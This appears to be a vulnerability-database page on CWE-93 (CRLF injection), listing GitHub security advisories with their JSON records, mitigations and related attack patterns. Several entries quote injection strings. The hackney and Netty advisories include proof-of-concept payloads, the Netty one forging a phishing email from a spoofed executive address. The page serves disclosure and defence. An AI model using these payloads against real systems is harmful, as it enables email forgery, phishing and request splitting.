CWE-93
AllowedImproper Neutralization of CRLF Sequences ('CRLF Injection')
Abstraction: Base · Status: Draft
The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.
323 vulnerabilities reference this CWE, most recent first.
GHSA-J296-JHQ5-3X6C
Vulnerability from github – Published: 2024-03-06 18:30 – Updated: 2024-03-06 18:30A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access.
{
"affected": [],
"aliases": [
"CVE-2024-20337"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-06T17:15:09Z",
"severity": "HIGH"
},
"details": "A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user. \n\n This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access.",
"id": "GHSA-j296-jhq5-3x6c",
"modified": "2024-03-06T18:30:37Z",
"published": "2024-03-06T18:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20337"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J354-JR4F-Q3J5
Vulnerability from github – Published: 2022-05-24 16:48 – Updated: 2024-04-04 01:04Incorrect implementation in Content Security Policy in Google Chrome prior to 67.0.3396.79 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.
{
"affected": [],
"aliases": [
"CVE-2018-6148"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-06-27T17:15:00Z",
"severity": "MODERATE"
},
"details": "Incorrect implementation in Content Security Policy in Google Chrome prior to 67.0.3396.79 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.",
"id": "GHSA-j354-jr4f-q3j5",
"modified": "2024-04-04T01:04:52Z",
"published": "2022-05-24T16:48:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-6148"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2018/06/stable-channel-update-for-desktop.html"
},
{
"type": "WEB",
"url": "https://crbug.com/845961"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J4M7-FWX2-6W4C
Vulnerability from github – Published: 2022-05-17 02:45 – Updated: 2022-05-17 02:45An issue was discovered on Accellion FTA devices before FTA_9_12_180. There is a CRLF vulnerability in settings_global_text_edit.php allowing ?display=x%0Dnewline attacks.
{
"affected": [],
"aliases": [
"CVE-2017-8788"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-05-05T18:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered on Accellion FTA devices before FTA_9_12_180. There is a CRLF vulnerability in settings_global_text_edit.php allowing ?display=x%0Dnewline attacks.",
"id": "GHSA-j4m7-fwx2-6w4c",
"modified": "2022-05-17T02:45:14Z",
"published": "2022-05-17T02:45:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8788"
},
{
"type": "WEB",
"url": "https://gist.github.com/anonymous/32e2894fa29176f3f32cb2b2bb7c24cb"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J592-X6JP-9FG8
Vulnerability from github – Published: 2026-03-11 18:30 – Updated: 2026-03-11 18:30GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.11 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user to make unintended internal requests through proxy environments under certain conditions due to improper input validation in import functionality.
{
"affected": [],
"aliases": [
"CVE-2026-3848"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-11T16:16:47Z",
"severity": "MODERATE"
},
"details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.11 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user to make unintended internal requests through proxy environments under certain conditions due to improper input validation in import functionality.",
"id": "GHSA-j592-x6jp-9fg8",
"modified": "2026-03-11T18:30:32Z",
"published": "2026-03-11T18:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3848"
},
{
"type": "WEB",
"url": "https://about.gitlab.com/releases/2026/03/11/patch-release-gitlab-18-9-2-released"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/577298"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J6F7-HGHW-G437
Vulnerability from github – Published: 2022-05-17 03:05 – Updated: 2024-11-18 16:26bottle.py is a fast and simple micro-framework for python web-applications. redirect() in bottle.py in bottle 0.12.10 doesn't filter a "\r\n" sequence, which leads to a CRLF attack, as demonstrated by a redirect("233\r\nSet-Cookie: name=salt") call.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bottle"
},
"ranges": [
{
"events": [
{
"introduced": "0.10.1"
},
{
"fixed": "0.12.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-9964"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2022-05-31T15:43:48Z",
"nvd_published_at": "2016-12-16T09:59:00Z",
"severity": "HIGH"
},
"details": "bottle.py is a fast and simple micro-framework for python web-applications. redirect() in bottle.py in bottle 0.12.10 doesn\u0027t filter a \"\\r\\n\" sequence, which leads to a CRLF attack, as demonstrated by a redirect(\"233\\r\\nSet-Cookie: name=salt\") call.",
"id": "GHSA-j6f7-hghw-g437",
"modified": "2024-11-18T16:26:23Z",
"published": "2022-05-17T03:05:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9964"
},
{
"type": "WEB",
"url": "https://github.com/bottlepy/bottle/issues/913"
},
{
"type": "WEB",
"url": "https://github.com/bottlepy/bottle/commit/6d7e13da0f998820800ecb3fe9ccee4189aefb54"
},
{
"type": "WEB",
"url": "https://github.com/bottlepy/bottle/commit/78f67d51965db11cb1ed0003f1eb7926458b5c2c"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-j6f7-hghw-g437"
},
{
"type": "PACKAGE",
"url": "https://github.com/bottlepy/bottle"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/bottle/PYSEC-2016-24.yaml"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20170214030628/http://www.securityfocus.com/bid/94961"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2016/dsa-3743"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "bottle.py vulnerable to CRLF Injection"
}
GHSA-J9WQ-VXXC-94WF
Vulnerability from github – Published: 2026-06-26 21:58 – Updated: 2026-06-26 21:58Summary
hackney_url:make_url/3 passes the URL query component directly into the HTTP/1.1 request target without percent-encoding \r or \n. RFC 3986 §3.4 requires characters outside the query grammar to be percent-encoded, but no validation or escaping occurs. An attacker who controls any portion of the URL passed to hackney can inject raw CRLF sequences into the request line, enabling HTTP header injection or full request splitting.
Details
hackney_url:make_url/3 in src/hackney_url.erl builds the request target by concatenating the path and query binaries. The query string is used as-is — no character-class check, no percent-encoding of \r or \n. When hackney serializes the request, the query value lands verbatim in the GET <path>?<query> HTTP/1.1\r\n request line. A query value containing \r\n terminates the request line early; subsequent bytes are parsed by the server (or any intermediary proxy) as additional header lines or a second request.
A concrete example: a URL with query ?q=x HTTP/1.1\r\nX-Injected: yes\r\nX: produces the following on the wire:
GET /?q=x HTTP/1.1
X-Injected: yes
X: HTTP/1.1
Host: ...
The server sees X-Injected: yes as a legitimate request header that the client never intended to send.
PoC
- Listen on a raw TCP port:
nc -lvnp 8080. - Issue:
:hackney.get("http://127.0.0.1:8080/?q=x HTTP/1.1\r\nX-Injected: yes\r\nX:"). - Observe the listener receives
X-Injected: yesas a standalone header line in the request.
Impact
HTTP header injection and request splitting against any server hackney connects to. Affects all released versions of hackney before 4.0.1. Exploitation requires an attacker-controlled URL (or URL component) to reach hackney without prior sanitization. Consequences include injecting arbitrary headers (Authorization, Host, X-Forwarded-For) and splitting requests through proxies. CVSS v4.0: 6.8 (MEDIUM).
Resources
- Introduction commit: https://github.com/benoitc/hackney/commit/8bb1a359a81ae58567c84f8d24564e9742e6f2bd
- Patch commit: https://github.com/benoitc/hackney/commit/ca73dd0aba0ed557449c18288bf07241671a43c9
{
"affected": [
{
"package": {
"ecosystem": "Hex",
"name": "hackney"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47075"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T21:58:59Z",
"nvd_published_at": "2026-05-25T15:16:22Z",
"severity": "MODERATE"
},
"details": "### Summary\n\n`hackney_url:make_url/3` passes the URL query component directly into the HTTP/1.1 request target without percent-encoding `\\r` or `\\n`. RFC 3986 \u00a73.4 requires characters outside the query grammar to be percent-encoded, but no validation or escaping occurs. An attacker who controls any portion of the URL passed to hackney can inject raw CRLF sequences into the request line, enabling HTTP header injection or full request splitting.\n\n### Details\n\n`hackney_url:make_url/3` in `src/hackney_url.erl` builds the request target by concatenating the path and query binaries. The query string is used as-is \u2014 no character-class check, no percent-encoding of `\\r` or `\\n`. When hackney serializes the request, the query value lands verbatim in the `GET \u003cpath\u003e?\u003cquery\u003e HTTP/1.1\\r\\n` request line. A query value containing `\\r\\n` terminates the request line early; subsequent bytes are parsed by the server (or any intermediary proxy) as additional header lines or a second request.\n\nA concrete example: a URL with query `?q=x HTTP/1.1\\r\\nX-Injected: yes\\r\\nX:` produces the following on the wire:\n\n```\nGET /?q=x HTTP/1.1\nX-Injected: yes\nX: HTTP/1.1\nHost: ...\n```\n\nThe server sees `X-Injected: yes` as a legitimate request header that the client never intended to send.\n\n### PoC\n\n1. Listen on a raw TCP port: `nc -lvnp 8080`.\n2. Issue: `:hackney.get(\"http://127.0.0.1:8080/?q=x HTTP/1.1\\r\\nX-Injected: yes\\r\\nX:\")`.\n3. Observe the listener receives `X-Injected: yes` as a standalone header line in the request.\n\n### Impact\n\nHTTP header injection and request splitting against any server hackney connects to. Affects all released versions of hackney before 4.0.1. Exploitation requires an attacker-controlled URL (or URL component) to reach hackney without prior sanitization. Consequences include injecting arbitrary headers (`Authorization`, `Host`, `X-Forwarded-For`) and splitting requests through proxies. CVSS v4.0: **6.8 (MEDIUM)**.\n\n## Resources\n\n* Introduction commit: https://github.com/benoitc/hackney/commit/8bb1a359a81ae58567c84f8d24564e9742e6f2bd\n* Patch commit: https://github.com/benoitc/hackney/commit/ca73dd0aba0ed557449c18288bf07241671a43c9",
"id": "GHSA-j9wq-vxxc-94wf",
"modified": "2026-06-26T21:58:59Z",
"published": "2026-06-26T21:58:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/benoitc/hackney/security/advisories/GHSA-j9wq-vxxc-94wf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47075"
},
{
"type": "WEB",
"url": "https://github.com/benoitc/hackney/commit/ca73dd0aba0ed557449c18288bf07241671a43c9"
},
{
"type": "WEB",
"url": "https://cna.erlef.org/cves/CVE-2026-47075.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/benoitc/hackney"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/EEF-CVE-2026-47075"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Hackney has CR/LF injection in query parameter"
}
GHSA-JCQ8-V68H-2C44
Vulnerability from github – Published: 2026-06-04 18:30 – Updated: 2026-06-04 18:30In libinput before 1.30.4 and 1.31.x before 1.31.3, libinput-device-group unescaped phys output can inject udev properties leading to arbitrary root code execution
{
"affected": [],
"aliases": [
"CVE-2026-50292"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-04T18:16:32Z",
"severity": "HIGH"
},
"details": "In libinput before 1.30.4 and 1.31.x before 1.31.3, libinput-device-group unescaped phys output can inject udev properties leading to arbitrary root code execution",
"id": "GHSA-jcq8-v68h-2c44",
"modified": "2026-06-04T18:30:33Z",
"published": "2026-06-04T18:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50292"
},
{
"type": "WEB",
"url": "https://gitlab.freedesktop.org/libinput/libinput/-/commit/76f0d8a7f57e2868882864b4611281f12f704b55"
},
{
"type": "WEB",
"url": "https://gitlab.freedesktop.org/libinput/libinput/-/work_items/1296"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2026/06/04/5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JH94-8Q48-F3M3
Vulnerability from github – Published: 2026-01-23 18:31 – Updated: 2026-02-13 18:31The email module, specifically the "BytesGenerator" class, didn’t properly quote newlines for email headers when serializing an email message allowing for header injection when an email is serialized. This is only applicable if using "LiteralHeader" writing headers that don't respect email folding rules, the new behavior will reject the incorrectly folded headers in "BytesGenerator".
{
"affected": [],
"aliases": [
"CVE-2026-1299"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-23T17:16:12Z",
"severity": "MODERATE"
},
"details": "The \nemail module, specifically the \"BytesGenerator\" class, didn\u2019t properly quote newlines for email headers when \nserializing an email message allowing for header injection when an email\n is serialized. This is only applicable if using \"LiteralHeader\" writing headers that don\u0027t respect email folding rules, the new behavior will reject the incorrectly folded headers in \"BytesGenerator\".",
"id": "GHSA-jh94-8q48-f3m3",
"modified": "2026-02-13T18:31:23Z",
"published": "2026-01-23T18:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1299"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/issues/144125"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/pull/144126"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/052e55e7d44718fe46cbba0ca995cb8fcc359413"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/0a925ab591c45d6638f37b5e57796f36fa0e56d8"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/7877fe424415bc4a13045e62a90a7277413d8cb9"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/842ce19a0c0b58d61591e8f6a708c38db1fb94e4"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/8cdf6204f4ae821f32993f8fc6bad0d318f95f36"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/e417f05ad77a4c30ddc07f99e90fc0cef43e831a"
},
{
"type": "WEB",
"url": "https://cve.org/CVERecord?id=CVE-2024-6923"
},
{
"type": "WEB",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6ZZULGALJTITEAGEXLDJE2C6FORDXPBT"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-JQ43-27X9-3V86
Vulnerability from github – Published: 2025-10-15 17:12 – Updated: 2025-10-17 21:32Summary
An SMTP Command Injection (CRLF Injection) vulnerability in Netty's SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications.
Details
The root cause is the lack of input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters.
The vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command.
Because the injected commands are sent from the server's trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim's email client.
PoC
A minimal PoC involves passing a crafted string containing CRLF sequences to any SmtpRequest that accepts user-controlled parameters.
1. Malicious Payload
The core of the exploit is the payload, where new SMTP commands are injected into a parameter.
// The legitimate recipient is followed by an injected email sequence
String injected_recipient = "legit-recipient@example.com\r\n" +
"MAIL FROM:<ceo@trusted-domain.com>\r\n" +
"RCPT TO:<victim@anywhere.com>\r\n" +
"DATA\r\n" +
"From: ceo@trusted-domain.com\r\n" +
"To: victim@anywhere.com\r\n" +
"Subject: Urgent: Phishing Email\r\n" +
"\r\n" +
"This is a forged email that will pass authentication checks.\r\n" +
".\r\n" +
"QUIT\r\n";
2. Triggering the Vulnerability
The vulnerability is triggered when this payload is used to create an SMTP request.
// The Netty SMTP codec will fail to sanitize this input
SmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);
// When this request is sent to an SMTP server, the injected commands
// will be executed, sending a forged email.
channel.writeAndFlush(maliciousRequest);
3. Full Reproduction Steps
A complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server
- Full PoC Code: https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c
To run the full PoC:
- Set up a local SMTP server. The easiest way is using MailHog:
- On macOS:
brew install mailhog && mailhog - Using Docker:
docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog
- On macOS:
- Run the PoC code. The code will connect to the SMTP server at
localhost:1025and send the malicious payload. - Verify the result. Open the MailHog web UI at
http://localhost:8025. You will see the forged email sent tovictim@anywhere.comfromceo@trusted-domain.com.
Impact
This is a SMTP Command Injection vulnerability. It impacts any application using netty-codec-smtp to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., from, recipient, helo hostname).
The primary impacts are: * Economic Manipulation & Disinformation: Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption. * Sophisticated Phishing: Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-smtp"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.7.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-smtp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.128.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59419"
],
"database_specific": {
"cwe_ids": [
"CWE-78",
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-15T17:12:55Z",
"nvd_published_at": "2025-10-15T16:15:35Z",
"severity": "HIGH"
},
"details": "### Summary\nAn SMTP Command Injection (CRLF Injection) vulnerability in Netty\u0027s SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications.\n\n### Details\nThe root cause is the lack of input validation for Carriage Return (\\r) and Line Feed (\\n) characters in user-supplied parameters.\n\nThe vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command.\n\nBecause the injected commands are sent from the server\u0027s trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim\u0027s email client.\n\n### PoC\nA minimal PoC involves passing a crafted string containing CRLF sequences to any `SmtpRequest` that accepts user-controlled parameters.\n\n**1. Malicious Payload**\n\nThe core of the exploit is the payload, where new SMTP commands are injected into a parameter.\n\n```java\n// The legitimate recipient is followed by an injected email sequence\nString injected_recipient = \"legit-recipient@example.com\\r\\n\" +\n \"MAIL FROM:\u003cceo@trusted-domain.com\u003e\\r\\n\" +\n \"RCPT TO:\u003cvictim@anywhere.com\u003e\\r\\n\" +\n \"DATA\\r\\n\" +\n \"From: ceo@trusted-domain.com\\r\\n\" +\n \"To: victim@anywhere.com\\r\\n\" +\n \"Subject: Urgent: Phishing Email\\r\\n\" +\n \"\\r\\n\" +\n \"This is a forged email that will pass authentication checks.\\r\\n\" +\n \".\\r\\n\" +\n \"QUIT\\r\\n\";\n```\n\n**2. Triggering the Vulnerability**\n\nThe vulnerability is triggered when this payload is used to create an SMTP request.\n\n```java\n// The Netty SMTP codec will fail to sanitize this input\nSmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);\n\n// When this request is sent to an SMTP server, the injected commands\n// will be executed, sending a forged email.\nchannel.writeAndFlush(maliciousRequest);\n```\n\n**3. Full Reproduction Steps**\n\nA complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server\n\n* **Full PoC Code:** https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c\n\nTo run the full PoC:\n\n1. **Set up a local SMTP server.** The easiest way is using MailHog:\n * On macOS: `brew install mailhog \u0026\u0026 mailhog`\n * Using Docker: `docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog`\n2. **Run the PoC code.** The code will connect to the SMTP server at `localhost:1025` and send the malicious payload.\n3. **Verify the result.** Open the MailHog web UI at `http://localhost:8025`. You will see the forged email sent to `victim@anywhere.com` from `ceo@trusted-domain.com`.\n\n### Impact\nThis is a SMTP Command Injection vulnerability. It impacts any application using `netty-codec-smtp` to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., `from`, `recipient`, `helo` hostname).\n\nThe primary impacts are:\n* **Economic Manipulation \u0026 Disinformation:** Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption.\n* **Sophisticated Phishing:** Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.",
"id": "GHSA-jq43-27x9-3v86",
"modified": "2025-10-17T21:32:39Z",
"published": "2025-10-15T17:12:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59419"
},
{
"type": "WEB",
"url": "https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120"
},
{
"type": "WEB",
"url": "https://github.com/netty/netty/commit/2b3fddd3339cde1601f622b9ce5e54c39f24c3f9"
},
{
"type": "WEB",
"url": "https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
},
{
"type": "WEB",
"url": "https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Netty has SMTP Command Injection Vulnerability that Allows Email Forgery"
}
GHSA-JWPW-Q68H-R678
Vulnerability from github – Published: 2022-05-24 17:47 – Updated: 2023-10-05 17:32Duplicate advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9324-jv53-9cc8. This link is maintained to preserve external references.
Original Description
The dio package prior to 5.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669.
{
"affected": [
{
"package": {
"ecosystem": "Pub",
"name": "dio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-88",
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-15T03:27:03Z",
"nvd_published_at": "2021-04-15T19:15:00Z",
"severity": "HIGH"
},
"details": "## Duplicate advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9324-jv53-9cc8. This link is maintained to preserve external references.\n\n## Original Description\nThe dio package prior to 5.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669.",
"id": "GHSA-jwpw-q68h-r678",
"modified": "2023-10-05T17:32:48Z",
"published": "2022-05-24T17:47:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31402"
},
{
"type": "WEB",
"url": "https://github.com/cfug/dio/issues/1130"
},
{
"type": "WEB",
"url": "https://github.com/cfug/dio/commit/927f79e93ba39f3c3a12c190624a55653d577984"
},
{
"type": "PACKAGE",
"url": "https://github.com/cfug/dio"
},
{
"type": "WEB",
"url": "https://osv.dev/GHSA-jwpw-q68h-r678"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Duplicate Advisory: Improper Neutralization of CRLF Sequences in dio",
"withdrawn": "2023-10-05T17:32:48Z"
}
Mitigation
Avoid using CRLF as a special sequence.
Mitigation
Appropriately filter or quote CRLF sequences in user-controlled input.
CAPEC-15: Command Delimiters
An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
CAPEC-81: Web Server Logs Tampering
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.